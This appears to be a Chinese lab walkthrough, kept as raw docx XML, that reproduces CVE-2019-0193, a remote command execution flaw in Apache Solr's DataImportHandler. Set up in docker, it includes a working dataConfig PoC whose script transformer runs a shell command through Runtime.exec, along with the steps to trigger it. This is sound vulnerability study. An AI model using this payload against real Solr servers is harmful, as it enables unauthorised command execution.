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EBD01" w14:textId="77777777" w:rsidR="00EA527E" w:rsidRPr="00EA527E" w:rsidRDefault="00EA527E" w:rsidP="00EA527E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="PingFang SC" w:eastAsia="PingFang SC" w:hAnsi="PingFang SC" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA527E">
        <w:rPr>
          <w:rFonts w:ascii="PingFang SC" w:eastAsia="PingFang SC" w:hAnsi="PingFang SC" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-0193（Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA527E">
        <w:rPr>
          <w:rFonts w:ascii="PingFang SC" w:eastAsia="PingFang SC" w:hAnsi="PingFang SC" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA527E">
        <w:rPr>
          <w:rFonts w:ascii="PingFang SC" w:eastAsia="PingFang SC" w:hAnsi="PingFang SC" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222226"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 远程命令执行漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F0EFE" w14:textId="15CC67F4" w:rsidR="00ED1667" w:rsidRDefault="00004832">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C62CEE1" w14:textId="77777777" w:rsidR="00004832" w:rsidRDefault="00004832"/>
    <w:p w14:paraId="2B5E8AF4" w14:textId="2FFBFABF" w:rsidR="00004832" w:rsidRDefault="00004832">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是基于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的一个搜索服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F19CC" w14:textId="77777777" w:rsidR="00004832" w:rsidRDefault="00004832">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505ABE05" w14:textId="3FE44659" w:rsidR="00004832" w:rsidRPr="00004832" w:rsidRDefault="00004832">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00004832">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞原因：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611837A1" w14:textId="3D94D4F3" w:rsidR="00004832" w:rsidRDefault="00004832">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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Data</w:t>
      </w:r>
      <w:r>
        <w:t>ImportHandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，用于从数据库和其他源中提取数据，他有一个功能，其中所有的DIH配置都可以通过外部请求</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dataconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数来设置，由于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dataconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置可以包含脚本 因此攻击者就可以构造危险请求达到RCE的目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE3A124" w14:textId="77777777" w:rsidR="00004832" w:rsidRDefault="00004832"/>
    <w:p w14:paraId="67976A48" w14:textId="0378EDD1" w:rsidR="00004832" w:rsidRDefault="00004832">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>ip:8983</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A07D21" w14:textId="042BD594" w:rsidR="00004832" w:rsidRDefault="00004832">
      <w:r w:rsidRPr="00004832">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20AD4D8F" wp14:editId="230D5E09">
            <wp:extent cx="5274310" cy="3606165"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="387162603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62603" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件, 网站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B364" w14:textId="77777777" w:rsidR="00004832" w:rsidRDefault="00004832"/>
    <w:p w14:paraId="0E0437A0" w14:textId="06D0AB06" w:rsidR="00004832" w:rsidRDefault="00004832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solr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 xml:space="preserve"> example/example-DIH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：可以作为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solr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的主目录，里面包含多个索引库，以及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hsqldb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的数据，里面有连接数据库的配置示例，以及邮件、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rss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的配置示例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331FC0F" w14:textId="3A3A28B7" w:rsidR="00004832" w:rsidRDefault="00004832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docker compose exec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solr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bash bin/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solr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create_core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-c test -d example/example-DIH/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solr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db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="731088CB" w14:textId="5F9841EF" w:rsidR="00004832" w:rsidRDefault="000B3195">
      <w:r w:rsidRPr="000B3195">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F264B7B" wp14:editId="3FFB8832">
            <wp:extent cx="5274310" cy="365125"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="466135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35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4718" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195"/>
    <w:p w14:paraId="7745CE2E" w14:textId="5A574AB2" w:rsidR="000B3195" w:rsidRDefault="000B3195">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建之后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF212DB" w14:textId="1ABBF1C3" w:rsidR="000B3195" w:rsidRDefault="000B3195">
      <w:r w:rsidRPr="000B3195">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37368681" wp14:editId="17D101C6">
            <wp:extent cx="5274310" cy="3012440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="143267713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77138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C58" w14:textId="7A10746A" w:rsidR="000B3195" w:rsidRDefault="000B3195">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在配置的输入框里加入执行的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="183CE55E" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dataConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73380A95" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dataSource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> type="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>URLDataSource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FAE240" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&lt;![</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC68F48" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">          function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">){ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>java.lang.Runtime.getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>().exec("touch /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/success");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2273BBCA" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF7E6F5" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">  ]]&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D643625" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">  &lt;document&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687E0DEB" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">    &lt;entity name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stackoverflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8E077" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="https://stackoverflow.com/feeds/tag/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF804E0" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">            processor="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XPathEntityProcessor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE008CD" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="/feed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE6B07" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">            transformer="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>script:poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501CBB1E" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t xml:space="preserve">  &lt;/document&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A45BB9" w14:textId="794343FD" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dataConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E0BABC" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195"/>
    <w:p w14:paraId="74D4DA8C" w14:textId="6D6E15AB" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加之后 点击蓝色的Execute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with this configuration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1057F8E6" w14:textId="31916360" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r w:rsidRPr="000B3195">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="319E1585" wp14:editId="54781E65">
            <wp:extent cx="5274310" cy="2723515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11739287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2870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800A" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195"/>
    <w:p w14:paraId="1A5D99E8" w14:textId="2E51B278" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看绿色处就是执行完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C293E5" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195"/>
    <w:p w14:paraId="517AF5A2" w14:textId="2C36E198" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行docker 查看是否创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BBDDEB" w14:textId="708B8B60" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195">
      <w:r w:rsidRPr="000B3195">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="346ECE26" wp14:editId="587D7513">
            <wp:extent cx="5274310" cy="215900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95071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1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F605" w14:textId="77777777" w:rsidR="000B3195" w:rsidRDefault="000B3195" w:rsidP="000B3195"/>
    <w:p w14:paraId="7604B9B3" w14:textId="22E48E71" w:rsidR="000B3195" w:rsidRDefault="000C1361" w:rsidP="000B3195">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用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对执行配置进行抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D51B33" w14:textId="38ED05E2" w:rsidR="000C1361" w:rsidRDefault="000C1361" w:rsidP="000B3195">
      <w:r w:rsidRPr="000C1361">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78077D06" wp14:editId="2594B8AD">
            <wp:extent cx="5274310" cy="3140075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179330671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06711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B697" w14:textId="435FC407" w:rsidR="000C1361" w:rsidRDefault="000C1361" w:rsidP="000B3195">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的内容是进行编码的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54481DBF" w14:textId="77777777" w:rsidR="000C1361" w:rsidRDefault="000C1361" w:rsidP="000B3195"/>
    <w:sectPr w:rsidR="000C1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27E"/>
    <w:rsid w:val="00004832"/>
    <w:rsid w:val="000B3195"/>
    <w:rsid w:val="000C1361"/>
    <w:rsid w:val="005A1CB5"/>
    <w:rsid w:val="00710D8A"/>
    <w:rsid w:val="008B738E"/>
    <w:rsid w:val="00EA527E"/>
    <w:rsid w:val="00ED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BDB77"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C66B53D4-136C-214D-8DE2-81C16B42D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A527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527E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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-15T12:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-15T12:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>